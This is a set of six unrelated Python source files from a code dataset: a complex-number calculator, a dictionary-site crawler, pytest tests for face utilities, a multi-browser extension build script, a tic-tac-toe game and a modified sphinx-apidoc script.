+{"seq_id":"3556013","text":"\r\nclass complex_number:\r\n def __init__(self,x=0,y=0):\r\n self.x=x\r\n self.y=y\r\n\r\n def show(self):\r\n if self.y>0:\r\n print(self.x, '+', self.y, 'i')\r\n else:\r\n print(self.x, self.y, 'i')\r\n\r\n def sum(self,other):\r\n res=complex_number()\r\n res.x=self.x + other.x\r\n res.y=self.y + other.y\r\n return res\r\n\r\n def sub(self,other):\r\n res = complex_number()\r\n res.x = self.x - other.x\r\n res.y = self.y - other.y\r\n return res\r\n\r\n def mul(self,other):\r\n res = complex_number()\r\n res.x = ((self.x * other.x)-(self.y * other.y))\r\n res.y = ((self.x * other.y)+(self.y + other.x))\r\n return res\r\n\r\n\r\n\r\nwhile True:\r\n print('enter the complex number1 :')\r\n x1 = int(input())\r\n y1 = int(input())\r\n n1 = complex_number(x1 ,y1)\r\n n1.show()\r\n print('enter the complex number2 :')\r\n x2 = int(input())\r\n y2 = int(input())\r\n n2 = complex_number(x2, y2)\r\n n2.show()\r\n while True:\r\n print('choose:\\n1.add\\n2.sub\\n3.mul\\n4.exit\\n')\r\n c = int(input())\r\n if c==1:\r\n N=n1.sum(n2)\r\n N.show()\r\n if c==2:\r\n N=n1.sub(n2)\r\n N.show()\r\n if c==3:\r\n N=n1.mul(n2)\r\n N.show()\r\n if c==4:\r\n break\r\n e = input('Do you want to continue with other complex numbers? [y/n]')\r\n if e == 'n':\r\n break","sub_path":"mokhtalet.py","file_name":"mokhtalet.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"146143909","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# @Description:\n# @File: cnki_dict_words.py\n# @Project: ip_nlp\n# @Author: Yiheng\n# @Email: GuoYiheng89@gmail.com\n# @Time: 7/22/2019 9:27\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom utils import file_utils\n\nbase_url = 'http://dict.cnki.net/'\ncatalogue_url = 'http://dict.cnki.net/dict_sub.aspx'\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/71.0.3578.98 Safari/537.36'}\n\n\ndef get_html(url):\n try:\n print('get html url is {}'.format(url))\n response = requests.get(url, timeout=20)\n if response.status_code == 200:\n return response.text\n except requests.RequestException:\n print('get html {} exception...'.format(url))\n return None\n\n\ndef get_categories_uri(html_text):\n soup = BeautifulSoup(html_text, features='lxml')\n filter_attrs = {'title': re.compile('.'),\n 'href': re.compile('html$')}\n\n a_tags = soup.find_all('a', attrs=filter_attrs)\n hrefs = [a_tag['href'] for a_tag in a_tags]\n # for href in hrefs:\n # print('href is {}'.format(href))\n return hrefs\n\n\ndef get_words_from_ctg(ctg_uris):\n for ctg_uri in ctg_uris:\n print('ctg uri is {}'.format(ctg_uri))\n ctg_pg0 = get_html(base_url + ctg_uri)\n\n page_count = get_page_count(ctg_pg0)\n for page_num in range(page_count):\n splits = ctg_uri.split('.')\n jump_uri = '%s_%d.html' % (splits[0], page_num + 1)\n ctg_page_uri = base_url + jump_uri\n ctg_page = get_html(ctg_page_uri)\n if ctg_page:\n yield get_words_from_ctg_page(ctg_page)\n\n\ndef get_page_count(ctg_pg0):\n soup = BeautifulSoup(ctg_pg0, features='lxml')\n page_info = soup.find('span', text=re.compile('^共.*')).text\n print('page info is {}'.format(page_info))\n # 共16页 共[306]词汇\n matcher = re.search('[0-9]+', page_info)\n\n return int(matcher.group(0)) if matcher else 0\n\n\ndef get_words_from_ctg_page(ctg_pg):\n soup = BeautifulSoup(ctg_pg, features='lxml')\n tr_tags = soup.find(id='lblcon').find_all('tr')\n words = [tr_tag.find_all('td')[1].a.text for tr_tag in tr_tags if not tr_tag.has_attr('class')]\n return words\n\n\nif __name__ == '__main__':\n html = get_html(catalogue_url)\n # print('text {}'.format(html))\n ctg_uris = get_categories_uri(html)\n words = get_words_from_ctg(ctg_uris)\n dict_cnki_path = 'F:/temp/ip_nlp/cnki_dict.txt'\n for word in words:\n # print(word)\n file_utils.save_list2file(word, dict_cnki_path)\n print('all task complete...')\n","sub_path":"src/crawlers/cnki_dict_words.py","file_name":"cnki_dict_words.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"124904831","text":"\"\"\"\nImplement unittest for the utils.py file.\n\"\"\"\nimport pytest\n\nfrom utils import Photo, get_common_face_uids, _get_faces_by_uids, \\\n get_best_face\n\n\n@pytest.fixture\ndef photo1():\n \"\"\"\n Create a photo.\n\n :return: The created photo\n :rtype: Photo\n \"\"\"\n return Photo(None)\n\n\n@pytest.fixture\ndef photo2():\n \"\"\"\n Create a photo.\n\n :return: The created photo.\n :rtype: Photo\n \"\"\"\n return Photo(None)\n\n\n@pytest.fixture\ndef mock_face_api(mocker):\n \"\"\"\n Mock the azure face api.\n\n :type mocker: pytest_mock.MockFixture\n \"\"\"\n mocker.patch('utils.cf.face')\n\n\n@pytest.fixture\ndef photo_multiple_faces(generator, photo1, photo2):\n \"\"\"\n :type photo1: Photo\n :type photo2: Photo\n \"\"\"\n f1 = generator.face(photo=photo1, uid='a')\n f2 = generator.face(photo=photo1, uid='b')\n photo1.uid_to_face = {'a': f1, 'b': f2}\n\n return photo1\n\n\n@pytest.mark.usefixtures(\"mock_face_api\")\nclass TestGetCommonFaceUids:\n \"\"\"\n test get_common_face_uids\n \"\"\"\n def test_no_common_face(self, photo1, photo2):\n \"\"\"\n Make sure that when there is no common face(all the faces\n are different) then the function returns one of them.\n\n :type photo1: Photo\n :type photo2: Photo\n \"\"\"\n result = get_common_face_uids([photo1, photo2])\n assert result is not None\n\n def test_happy_flow(self, generator, photo_multiple_faces, photo2):\n \"\"\"\n Make sure that the function returns the appropriate most common face.\n\n :type generator: tests.data_population.Generator\n :type photo_multiple_faces: Photo\n :type photo2: Photo\n \"\"\"\n generator.face(photo=photo2, uid='c')\n\n faces = get_common_face_uids([photo_multiple_faces, photo2])\n for face in faces:\n assert face.uid in ['a', 'c']\n\n def test_no_faces(self, photo1, photo2):\n \"\"\"\n Make sure that when there are no faces detected in the pictures that\n the function will returned `None`.\n\n :type photo1: Photo\n :type photo2: Photo\n \"\"\"\n assert get_common_face_uids([photo1, photo2]) == []\n\n def test_no_photos(self):\n \"\"\"\n Make sure that when no photos given are input to the function that\n None is returned.\n \"\"\"\n assert get_common_face_uids([]) == []\n\n\nclass TestGetBestFace:\n \"\"\"\n test get_best_face.\n \"\"\"\n def test_no_faces(self):\n \"\"\"\n Make sure that when no faces are given that nothing is returned.\n \"\"\"\n get_best_face([])\n\n def test_equal_best(self, generator):\n \"\"\"\n Test what happens when there are equal best faces - just return\n the first one.\n\n :type generator: Generator\n \"\"\"\n face1, face2 = generator.faces('a', 'b')\n photo = generator.photo(face1, face2)\n face1.size = 100\n face2.size = 100\n photo.size = 1000\n\n result = get_best_face([face1, face2])\n assert result is face1\n\n def test_happy_flow(self, generator):\n \"\"\"\n Make sure the function works in normal flow. The face which covers\n the most of the photo should be returned.\n\n :type generator: Generator\n \"\"\"\n face1, face2 = generator.faces('a', 'b')\n photo = generator.photo(face1, face2)\n face1.size = 100\n face2.size = 500\n photo.size = 1000\n\n result = get_best_face([face1, face2])\n assert result is face2\n\n\n@pytest.mark.parametrize(\"generated_uids, required_uids, expected_uids\",\n [\n # happy-flow\n ([\"a\", \"b\", \"c\"], [\"a\", \"b\"], [\"a\", \"b\"]),\n # empty flow\n ([\"a\", \"b\", \"c\"], [], []),\n # invalid call, don't throw an exception\n ([], [\"a\"], [])\n ]\n )\ndef test_get_faces_by_uids(generator, generated_uids, required_uids,\n expected_uids):\n \"\"\"\n Test that the get_faces_by_uids returns the proper Face objects.\n\n :type generator: tests.data_population.Generator\n :param list generated_uids: The IDs of the faces that will be generated.\n :param list required_uids: The IDs that will be required from the\n _get_faces-by_uids function\n :param list expected_uids: The UIDs that will be expected to be returned\n from the function.\n \"\"\"\n faces = generator.faces(*generated_uids)\n uids = required_uids\n\n faces = _get_faces_by_uids(uids, faces)\n\n for face in faces:\n assert face.uid in expected_uids\n","sub_path":"tests/test_utils_mock/test_utils_mock.py","file_name":"test_utils_mock.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"473102624","text":"import os\nimport sys\nfrom distutils.dir_util import copy_tree\nimport shutil\nimport json\n\nfirefox_dev_proj_dir_name = 'firefox_dev'\n\ndef get_version():\n manifest_path = 'temp/manifest.json'\n\n with open(manifest_path, 'r') as f:\n data = json.load(f)\n return data['version'].replace('.', '')\n\ndef replace_strings_for_edge():\n background_path = 'temp/main/background.js'\n\n with open(background_path, 'r') as f:\n data = f.read()\n data = data.replace('''tpga_browser = 'chrome';''', '''tpga_browser = 'edge';''')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/reviews/', 'https://microsoftedge.microsoft.com/addons/detail/twitch-previews/nmekhdckniaiegiekejhmcmddplmliel')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/', 'https://microsoftedge.microsoft.com/addons/detail/twitch-previews/nmekhdckniaiegiekejhmcmddplmliel')\n\n with open(background_path, 'w') as f:\n f.write(data)\n\ndef replace_strings_for_opera():\n background_path = 'temp/main/background.js'\n\n with open(background_path, 'r') as f:\n data = f.read()\n data = data.replace('''tpga_browser = 'chrome';''', '''tpga_browser = 'opera';''')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/reviews/', 'https://addons.opera.com/en/extensions/details/twitch-previews/')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/', 'https://addons.opera.com/en/extensions/details/twitch-previews/')\n\n with open(background_path, 'w') as f:\n f.write(data)\n\n\ndef replace_strings_for_firefox(f_dir):\n manifest_path = f_dir + '/manifest.json'\n background_path = f_dir + '/main/background.js'\n\n with open(manifest_path, 'r') as f:\n data = f.read()\n data = data.replace(''',\"content_security_policy\": \"script-src 'self' https://www.google-analytics.com; object-src 'self'\"''', '')\n\n with open(manifest_path, 'w') as f:\n f.write(data)\n\n with open(background_path, 'r') as f:\n data = f.read()\n data = data.replace('''(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\\n''' \\\n ''' (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\\n''' \\\n ''' m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\\n''' \\\n '''})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');\\n''' \\\n '''ga('create', 'UA-134155755-2', 'auto');\\n''' \\\n '''ga('set', 'checkProtocolTask', null);\\n''' \\\n '''ga('send', 'pageview', 'main');''', '') \\\n\n data = data.replace('''ga('send', 'event', category, action, value);''', '')\n data = data.replace('''tpga_browser = 'chrome';''', '''tpga_browser = 'firefox';''')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/reviews/', 'https://addons.mozilla.org/en-US/firefox/addon/twitchpreviews/')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/', 'https://addons.mozilla.org/en-US/firefox/addon/twitchpreviews/')\n\n with open(background_path, 'w') as f:\n f.write(data)\n\n\ndef make_firefox_dev_proj():\n if os.path.isdir(firefox_dev_proj_dir_name):\n shutil.rmtree(firefox_dev_proj_dir_name)\n os.mkdir(firefox_dev_proj_dir_name)\n copy_tree('../Twitch-Previews', firefox_dev_proj_dir_name)\n replace_strings_for_firefox(firefox_dev_proj_dir_name)\n\n\ndef build(browser):\n os.mkdir('temp')\n copy_tree('../Twitch-Previews', 'temp')\n\n if browser == 'chrome':\n pass\n elif browser == 'firefox':\n if os.path.isdir(firefox_dev_proj_dir_name):\n shutil.rmtree(firefox_dev_proj_dir_name)\n replace_strings_for_firefox('temp')\n elif browser == 'opera':\n replace_strings_for_opera()\n elif browser == 'edge':\n replace_strings_for_edge()\n\n output_filename = 'TwitchPreviewsV' + get_version() + '-' + browser\n shutil.make_archive(output_filename, 'zip', 'temp')\n shutil.rmtree('temp')\n\n\nif len(sys.argv) > 1:\n if sys.argv[1] == firefox_dev_proj_dir_name:\n make_firefox_dev_proj()\n else:\n build(sys.argv[1])\n","sub_path":"build/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"348456655","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n File name: solution.py\n Author: Alexander Popp\n Date created: 5/17/2018\n Date last modified: 8/3/2018\n Python version: 3.6.5\n Description:\n Problem #27: Tic Tac Toe Draw from http://www.practicepython.org\n For detailed description of the problem see the accompanying\n file named 'problem.txt' or refer to the aformentioned website.\n\"\"\"\n\n\n# Create a game class\nclass Game:\n def __init__(self):\n self.board = [[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]]\n self.players = [\"X\", \"O\"]\n self.empty = 9\n self.active_player = 0\n\t\t\n def place_move(self, row, column):\n if self.board[row - 1][column - 1] != 0:\n print(\"That position has already been played!\")\n else:\n self.board[row - 1][column - 1] = self.players[self.active_player]\n self.empty -= 1\n self.change_active_player()\n\t\t\n def check_moves(self):\n if self.empty == 0:\n return False\n return True\n\n def print_game(self):\n for row in self.board:\n print(row)\n\n def change_active_player(self):\n if self.active_player == 0:\n self.active_player = 1\n else:\n self.active_player = 0\n\n # Get player input\n def get_input(self):\n while True:\n try:\n player_input = input(\"[Player {}] Enter coordinates: (row, column) \".format(self.active_player + 1)).split(\",\")\n if len(player_input) == 2:\n position = [int(player_input[0]), int(player_input[1])]\n break\n else:\n print(\"Input not recognised.\\nPlease try again...\")\n except ValueError:\n print(\"Input not recognised.\\nPlease try again...\")\n return position\n\n def run_game(self):\n self.print_game()\n player_input = self.get_input()\n self.place_move(player_input[0], player_input[1])\n\n\n# Main function\ndef main():\n game = Game()\n while game.check_moves():\n game.run_game()\n game.print_game()\n print(\"Out of moves. GAME OVER!\")\n\n\n# Run program\nif __name__ == \"__main__\":\n main()\n","sub_path":"27-Tic_tac_toe_draw/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"90189557","text":"# -*- coding: utf-8 -*-\n\"\"\"\n sphinx.apidoc\n ~~~~~~~~~~~~~\n\n Parses a directory tree looking for Python modules and packages and creates\n ReST files appropriately to create code documentation with Sphinx. It also\n creates a modules index (named modules.).\n\n This is derived from the \"sphinx-autopackage\" script, which is:\n Copyright 2008 Société des arts technologiques (SAT),\n http://www.sat.qc.ca/\n\n :copyright: Copyright 2007-2014 by the Sphinx team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport string\nimport sys\nimport optparse\nimport traceback as tb\nfrom os.path import join\n\nfrom sphinx.util.osutil import walk\nfrom sphinx import __version__\n\n# automodule options\nif 'SPHINX_APIDOC_OPTIONS' in os.environ:\n OPTIONS = os.environ['SPHINX_APIDOC_OPTIONS'].split(',')\nelse:\n OPTIONS = [\n 'members',\n 'undoc-members',\n # 'inherited-members', # disabled because there's a bug in sphinx\n 'show-inheritance',\n ]\n\nINITPY = '__init__.py'\nPY_SUFFIXES = set(['.py', '.pyx'])\n\n\ndef makename(package, module):\n \"\"\"Join package and module with a dot.\"\"\"\n # Both package and module can be None/empty.\n if package:\n name = package\n if module:\n name += '.' + module\n else:\n name = module\n return name\n\n\ndef wrapped_print(msg, opts):\n if not opts.quiet:\n print(msg)\n\n\ndef write_file(name, text, opts):\n \"\"\"Write the output file for module/package .\"\"\"\n fname = join(opts.destdir, '%s.%s' % (name, opts.suffix))\n if opts.dryrun:\n wrapped_print('Would create file %s.' % fname, opts)\n return\n if not opts.force and os.path.isfile(fname):\n wrapped_print('File %s already exists, skipping.' % fname, opts)\n else:\n wrapped_print('Creating file %s.' % fname, opts)\n f = open(fname, 'w')\n try:\n f.write(text)\n finally:\n f.close()\n\n\ndef format_heading(level, text):\n \"\"\"Create a heading of [1, 2 or 3 supported].\"\"\"\n underlining = ['=', '-', '~', ][level - 1] * len(text)\n return '%s\\n%s\\n\\n' % (text, underlining)\n\n\ndef format_directive(module, package=None):\n \"\"\"Create the automodule directive and add the options.\"\"\"\n directive = '.. automodule:: %s\\n' % makename(package, module)\n for option in OPTIONS:\n directive += ' :%s:\\n' % option\n return directive\n\n\ndef create_module_file(package, module, opts):\n \"\"\"Build the text of the file and write the file.\"\"\"\n if not opts.noheadings:\n text = format_heading(1, '%s module' % module)\n else:\n text = ''\n #text += format_heading(2, ':mod:`%s` Module' % module)\n text += format_directive(module, package)\n write_file(makename(package, module), text, opts)\n\n\ndef create_package_file(master_package, subroot, submods, opts, subs):\n \"\"\"Build the text of the file and write the file.\"\"\"\n text = format_heading(1, '%s package' % makename(master_package, subroot))\n\n if opts.modulefirst:\n text += format_directive(subroot, master_package)\n text += '\\n'\n\n # if there are some package directories, add a TOC for theses subpackages\n if subs:\n text += format_heading(2, 'Subpackages')\n text += '.. toctree::\\n\\n'\n for sub in subs:\n text += ' %s.%s\\n' % (makename(master_package, subroot), sub)\n text += '\\n'\n\n if submods:\n text += format_heading(2, 'Submodules')\n if opts.separatemodules:\n text += '.. toctree::\\n\\n'\n for submod in submods:\n modfile = makename(master_package, makename(subroot, submod))\n text += ' %s\\n' % modfile\n\n # generate separate file for this module\n if not opts.noheadings:\n filetext = format_heading(1, '%s module' % modfile)\n else:\n filetext = ''\n filetext += format_directive(makename(subroot, submod),\n master_package)\n write_file(modfile, filetext, opts)\n else:\n for submod in submods:\n modfile = makename(master_package, makename(subroot, submod))\n if not opts.noheadings:\n text += format_heading(2, '%s module' % modfile)\n text += format_directive(makename(subroot, submod),\n master_package)\n text += '\\n'\n text += '\\n'\n\n if not opts.modulefirst:\n text += format_heading(2, 'Module contents')\n text += format_directive(subroot, master_package)\n\n write_file(makename(master_package, subroot), text, opts)\n\n\ndef create_modules_toc_file(modules, opts, name='modules'):\n \"\"\"Create the module's index.\"\"\"\n text = format_heading(1, '%s' % opts.header)\n text += '.. toctree::\\n'\n text += ' :maxdepth: %s\\n\\n' % opts.maxdepth\n\n modules.sort()\n prev_module = ''\n for module in modules:\n # look if the module is a subpackage and, if yes, ignore it\n if module.startswith(prev_module + '.'):\n continue\n prev_module = module\n text += ' %s\\n' % module\n\n write_file(name, text, opts)\n\n\ndef walk_dir_tree(rootpath, excludes, opts):\n \"\"\" Walk the directory tree and create the corresponding ReST files as \n dictated by the options.\n \"\"\"\n toplevels = []\n if has_initpy(rootpath):\n root_package = rootpath.split(os.sep)[-1]\n else:\n # Generate .rst files for the top level modules even if we are \n # not in a package (this is a one time exception)\n root_package = None\n mods = get_modules(os.listdir(rootpath), excludes, opts, rootpath)\n for module in mods:\n create_module_file(root_package, module, opts)\n toplevels.append(module)\n # Do the actual directory tree walk\n pkgname_mods_subpkgs = pkgname_modules_subpkgs(rootpath, excludes, opts)\n for pkgname, mods, subpkgs in pkgname_mods_subpkgs:\n create_package_file(root_package, pkgname, mods, opts, subpkgs)\n toplevels.append(makename(root_package, pkgname))\n\n return toplevels\n\n\ndef has_initpy(directory):\n return os.path.isfile( join(directory, INITPY) )\n\n\ndef pkgname_modules_subpkgs(rootpath, excluded, opts):\n \"\"\"A generator that filters out the packages and modules as desired and \n yields tuples of (package name, modules, subpackages). \n \"\"\"\n for root, dirs, files in walk(rootpath, followlinks=opts.followlinks):\n if root in excluded:\n del dirs[:] # skip all subdirectories as well\n continue\n if INITPY not in files:\n if root != rootpath:\n del dirs[:]\n continue\n pkg_name = root[len(rootpath):].lstrip(os.sep).replace(os.sep, '.')\n if not opts.includeprivate and pkg_name.startswith('_'):\n del dirs[:]\n continue\n modules = get_modules(files, excluded, opts, root)\n subpkgs = get_subpkgs(dirs, excluded, opts, root, rootpath)\n dirs[:] = subpkgs # visit only subpackages\n has_sg_to_doc = True \n if opts.respect_all:\n all_attr, has_docstr = get_all_attr_has_docstr(rootpath, root, opts)\n has_sg_to_doc = has_docstr or bool(all_attr)\n # has_sg_to_doc: e.g. multiprocessing.dummy has nonempty __all__ but \n # no modules, subpkgs or docstring to document -> still document it! \n modules = get_only_modules(all_attr, modules)\n if modules or subpkgs or has_sg_to_doc:\n yield pkg_name, modules, subpkgs\n\n\ndef get_modules(files, excluded, opts, root):\n \"\"\"Filter out and sort the considered python modules from files.\"\"\"\n return sorted( os.path.splitext(f)[0] for f in files\n if os.path.splitext(f)[1] in PY_SUFFIXES and\n norm_path(root, f) not in excluded and\n f != INITPY and\n (not f.startswith('_') or opts.includeprivate) )\n\n\ndef get_subpkgs(dirs, excluded, opts, root, rootpath):\n \"\"\"Filter out and sort the considered subpackages from dirs.\"\"\" \n exclude_prefixes = ('.',) if opts.includeprivate else ('.', '_')\n return sorted( d for d in dirs \n if not d.startswith(exclude_prefixes) and\n norm_path(root, d) not in excluded and\n has_initpy( join(root, d) ) and \n pkg_to_doc(opts, root, d, rootpath) )\n\n\ndef pkg_to_doc(opts, root, d, rootpath):\n if not opts.respect_all:\n return True\n all_attr, has_docstr = get_all_attr_has_docstr(rootpath, join(root,d), opts)\n return all_attr is None or bool(all_attr) or has_docstr \n\n\ndef get_only_modules(all_attr, modules):\n \"\"\"If ``__all__`` is not present in ``__init__.py``, we take all the modules\n in the current directory. Otherwise, we only keep those element of \n ``__all__`` that are also modules in the current directory.\"\"\"\n if all_attr is None:\n return modules\n mods = set(modules)\n return [m for m in all_attr if m in mods]\n\n\ndef get_all_attr_has_docstr(rootpath, path, opts, cached={}):\n \"\"\"Returns a tuple: the ``__all__`` attribute of the package as a list \n (``None`` if ``__all__`` is not present) and a ``bool`` indicating whether\n the module has a doc string. Calls ``sys.exit`` on failure \n (e.g. ``ImportError``), unless the --ignore-errors flag is used. Returns \n ``(None, False)`` on ignored error. A simple-minded caching is used as we \n look at each package twice.\n \"\"\"\n if path in cached:\n return cached[path]\n \n try:\n path_before = list(sys.path)\n modules_before = set(sys.modules)\n head, pkg = find_top_package(rootpath, path)\n sys.path.append(head) # Prepend or append?\n __import__(pkg) # for Python 2.6 compatibility\n module = sys.modules[pkg]\n all_attrib = get_all_from(module)\n # cairo and zope has __doc__ but it is None\n has_docstring = getattr(module, '__doc__', None) is not None\n cached[path] = (all_attrib, has_docstring)\n return cached[path]\n except AssertionError:\n raise \n except:\n print('\\n', tb.format_exc().rstrip(), file=sys.stderr) \n print('Please make sure that the package \\'%s\\' can be imported (or use'\n ' --ignore-errors\\nor exclude %s).' % (pkg,path), file=sys.stderr)\n if not opts.ignore_errors:\n sys.exit(1)\n finally:\n difference = sys.modules.viewkeys() - modules_before \n for k in difference:\n sys.modules.pop(k)\n sys.path = path_before\n # We only get here if there was an ignored error, for example on ImportError\n cached[path] = (None, False) \n return cached[path] \n\n\ndef find_top_package(root, path):\n \"\"\"Walks up in the directory hierarchy to find the top level package or \n until hitting the root.\n \"\"\"\n # For example with:\n # root = '/usr/lib/python2.7'\n # path = '/usr/lib/python2.7/dist-packages/scipy/sparse/linalg/isolve' \n # result: '/usr/lib/python2.7/dist-packages', 'scipy.sparse.linalg.isolve'\n assert path.startswith(root), '\\n%s\\n%s' % (root, path)\n assert has_initpy(path), path\n roothead = os.path.dirname(root)\n head, tail = os.path.split(path)\n while roothead != head and has_initpy(head): \n head, pkg = os.path.split(head)\n tail = join(pkg, tail)\n return head, string.replace(tail, os.sep, '.')\n\n\ndef get_all_from(module):\n all_attr = getattr(module, '__all__', None)\n # Some packages (for example dbus.mainloop.__init__.py) uses a tuple.\n # Convert __all__ to list if necessary. \n if all_attr is not None and not isinstance(all_attr, list):\n all_attr = list(all_attr) \n return all_attr\n\n\ndef norm_path(root, mod_or_dir):\n return os.path.normpath( join(root, mod_or_dir) )\n\n\ndef main(argv=sys.argv):\n \"\"\"Parse and check the command line arguments.\"\"\"\n parser = optparse.OptionParser(\n usage=\"\"\"\\\nusage: %prog [options] -o [exclude_path, ...]\n\nLook recursively in for Python modules and packages and create\none reST file with automodule directives per package in the .\n\nThe s can be files and/or directories that will be excluded\nfrom generation.\n\nNote: By default this script will not overwrite already created files.\"\"\")\n\n parser.add_option('-o', '--output-dir', action='store', dest='destdir',\n help='Directory to place all output', default='')\n parser.add_option('-d', '--maxdepth', action='store', dest='maxdepth',\n help='Maximum depth of submodules to show in the TOC '\n '(default: 4)', type='int', default=4)\n parser.add_option('-f', '--force', action='store_true', dest='force',\n help='Overwrite existing files')\n parser.add_option('-l', '--follow-links', action='store_true',\n dest='followlinks', default=False,\n help='Follow symbolic links. Powerful when combined '\n 'with collective.recipe.omelette.')\n parser.add_option('-n', '--dry-run', action='store_true', dest='dryrun',\n help='Run the script without creating files')\n parser.add_option('-e', '--separate', action='store_true',\n dest='separatemodules',\n help='Put documentation for each module on its own page')\n parser.add_option('-P', '--private', action='store_true',\n dest='includeprivate',\n help='Include \"_private\" modules')\n parser.add_option('-T', '--no-toc', action='store_true', dest='notoc',\n help='Don\\'t create a table of contents file')\n parser.add_option('-E', '--no-headings', action='store_true',\n dest='noheadings',\n help='Don\\'t create headings for the module/package '\n 'packages (e.g. when the docstrings already contain '\n 'them)')\n parser.add_option('-M', '--module-first', action='store_true',\n dest='modulefirst',\n help='Put module documentation before submodule '\n 'documentation')\n parser.add_option('-s', '--suffix', action='store', dest='suffix',\n help='file suffix (default: rst)', default='rst')\n parser.add_option('-F', '--full', action='store_true', dest='full',\n help='Generate a full project with sphinx-quickstart')\n parser.add_option('-H', '--doc-project', action='store', dest='header',\n help='Project name (default: root module name)')\n parser.add_option('-A', '--doc-author', action='store', dest='author',\n type='str',\n help='Project author(s), used when --full is given')\n parser.add_option('-V', '--doc-version', action='store', dest='version',\n help='Project version, used when --full is given')\n parser.add_option('-R', '--doc-release', action='store', dest='release',\n help='Project release, used when --full is given, '\n 'defaults to --doc-version')\n parser.add_option('--version', action='store_true', dest='show_version',\n help='Show version information and exit')\n parser.add_option('--respect-all', action='store_true',\n dest='respect_all',\n help='Respect __all__ when looking for modules')\n parser.add_option('--quiet', action='store_true',\n dest='quiet',\n help='Do not show which files are created or skipped')\n parser.add_option('--ignore-errors', action='store_true',\n dest='ignore_errors', \n help='Ignore import errors and continue')\n (opts, args) = parser.parse_args(argv[1:])\n\n if opts.show_version:\n print('Sphinx (sphinx-apidoc) %s' % __version__)\n return 0\n\n if not args:\n parser.error('A package path is required.')\n\n rootpath, excludes = args[0], args[1:]\n if not opts.destdir:\n parser.error('An output directory is required.')\n if opts.header is None:\n opts.header = os.path.normpath(rootpath).split(os.sep)[-1]\n if opts.suffix.startswith('.'):\n opts.suffix = opts.suffix[1:]\n if not os.path.isdir(rootpath):\n print('%s is not a directory.' % rootpath, file=sys.stderr)\n sys.exit(1)\n if opts.includeprivate and opts.respect_all:\n msg = 'Either --private or --respect-all but not both'\n print(msg, file=sys.stderr)\n sys.exit(1)\n if opts.ignore_errors and not opts.respect_all:\n msg = 'The --ignore-errors flag is only meaningful with --respect-all'\n print(msg, file=sys.stderr)\n sys.exit(1)\n if not os.path.isdir(opts.destdir):\n if not opts.dryrun:\n os.makedirs(opts.destdir)\n rootpath = os.path.normpath(os.path.abspath(rootpath))\n excludes = { os.path.normpath(os.path.abspath(excl)) for excl in excludes }\n modules = walk_dir_tree(rootpath, excludes, opts)\n if opts.full:\n modules.sort()\n prev_module = ''\n text = ''\n for module in modules:\n if module.startswith(prev_module + '.'):\n continue\n prev_module = module\n text += ' %s\\n' % module\n d = dict(\n path = opts.destdir,\n sep = False,\n dot = '_',\n project = opts.header,\n author = opts.author or 'Author',\n version = opts.version or '',\n release = opts.release or opts.version or '',\n suffix = '.' + opts.suffix,\n master = 'index',\n epub = True,\n ext_autodoc = True,\n ext_viewcode = True,\n makefile = True,\n batchfile = True,\n mastertocmaxdepth = opts.maxdepth,\n mastertoctree = text,\n )\n if not opts.dryrun:\n from sphinx import quickstart as qs\n qs.generate(d, silent=True, overwrite=opts.force)\n elif not opts.notoc:\n create_modules_toc_file(modules, opts)\n\nif __name__ == '__main__':\n main()\n","sub_path":"hacked.py","file_name":"hacked.py","file_ext":"py","file_size_in_byte":18605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
